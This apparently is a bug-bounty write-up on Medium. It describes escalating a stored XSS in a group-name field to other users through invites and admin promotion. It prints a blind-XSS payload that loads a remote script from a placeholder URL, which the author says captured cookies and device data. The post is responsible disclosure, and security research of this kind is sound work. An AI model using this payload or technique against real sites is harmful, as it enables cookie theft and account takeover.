Multiple xss in * (2)


So If you have read the part 1, You would have seen that I found a stored-self Xss in which was getting escalated in the option(“make the USER as admin of group_name”) as group_name was not properly sanitized there.

Here’s what I did to affect other users,You just need to create a invite link and make a user join your group.

Once ,the user joins your group ,You just need to make him as admin using the option I mentioned earlier.(requires no user interactions once he joins the group)

Once user is made as admin ,He will now see the same option called (“make the USER as admin of group_name”),where the gropu_name was not sanitized and xss gets executed successfully on the user also!!!

So It all ended???

No, I did more research and put a BXSS payload “><script src=”malicious_script_url”> in group_name.

Now add a member by sending the member a invite link.

Once the member clicks the invite link,and accepts it , xss was getting executed in another sub domain too(!!!

The BXSS payload used was provided by xsshunter ,through which I was able to get user details like

screenshot of affected page,user cookies,headers,device informations,ip address etc!!!

This has hell lot of information ,which is sufficient to compromise user data and also account takeover.

Then ,I made a final report combining all my research and sent them (

Finally ,I was acknowledged by Microsoft at their security researchers acknowledgement page(FEB-2019):

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store